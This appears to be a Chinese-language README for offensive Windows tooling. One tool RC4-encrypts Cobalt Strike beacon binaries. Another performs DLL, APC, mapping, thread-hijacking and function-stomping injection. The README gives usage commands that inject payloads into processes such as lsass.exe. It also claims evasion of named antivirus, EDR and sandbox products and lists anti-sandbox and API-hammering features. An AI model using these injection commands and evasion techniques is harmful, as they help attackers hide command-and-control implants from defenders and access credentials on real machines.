EncryptTools

对你的CS生成的Raw Bin进行RC4加密，确保你的bin不会直接落地秒杀

Usage:

将你的Bin改名为cs.bin，然后放在EncryptTools的同目录下，运行Encrypt之后，自己将生成的cs.cna改成新的bin文件去用

InjectTools

一款集成了DLL-Session0注入，APC注入，映射注入，线程劫持，函数踩踏，提权的工具(支持BIN加解密)

Function : DLL-Inject ，APC-Inject , Mapping Inject , Thread HiJacking , Function Stomping

Usage:

APC注入

Example:

InjectTools.exe 你要注入的程序 DLL完整路径

InjectTools.exe lsass.exe C:\Users\ASUS\Desktop\artifact_x64.dll

APCInject

DLL注入

example:

InjectTools.exe 你要注入的程序 DLL完整路径

InjectTools.exe lsass.exe C:\Users\users\Desktop\artifact_x64.dll

DLLInject

远程线程劫持 (加密BIN)

example: //这里建议RuntimeBroker

InjectTools.exe 你要注入的程序加密BIN完整路径

InjectTools.exe RuntimeBroker.exe C:\Users\users\Desktop\artifact_x64.bin

RemoteThreadHiJacking

映射注入 (加密BIN)

example:

InjectTools.exe 你要注入的程序加密BIN完整路径

InjectTools.exe OneDrive.exe C:\Users\users\Desktop\artifact_x64.bin

MappingInject

函数踩踏 (加密BIN)

InjectTools.exe 目标程序加密BIN完整路径目标程序加载的BIN 要踩踏的函数

InjectTools.exe Notepad.exe C:\Users\users\Desktop\artifact_x64.bin

User32.dll GetFocus

FunctionStomping

Anti-Virus

SandBox (2024.8.13)

VT (IKARUS。。。。给我报cobaltstrike是真抽象了吧）

微步 ThreatBook

360沙箱

EDR (2024.8.13)

McAfee EDR + FireEye Combined !! McAFeeEDR

Kaspersky EDR KasperskyEDR

AV (2024.8.13)

火绒

Windows Defender
WindowsDefender

360全家桶添加VLC图标绕过QVM

ESET ESET

赛门铁克 Symantec

TODO

[√] 普通动态调用静态过大部分杀软
[√] ICON,详细信息
[√] 反沙箱
[√] 普通API Hammering
[√] 实现文件加解密操作
[ ] 新的模块功能引入
[ ] PEB寻址
[ ] ....

InjectTools

Install / Use

README

EncryptTools

Usage:

InjectTools

Usage:

APC注入

DLL注入

远程线程劫持 (加密BIN)

映射注入 (加密BIN)

函数踩踏 (加密BIN)

Anti-Virus

SandBox (2024.8.13)

EDR (2024.8.13)

AV (2024.8.13)

TODO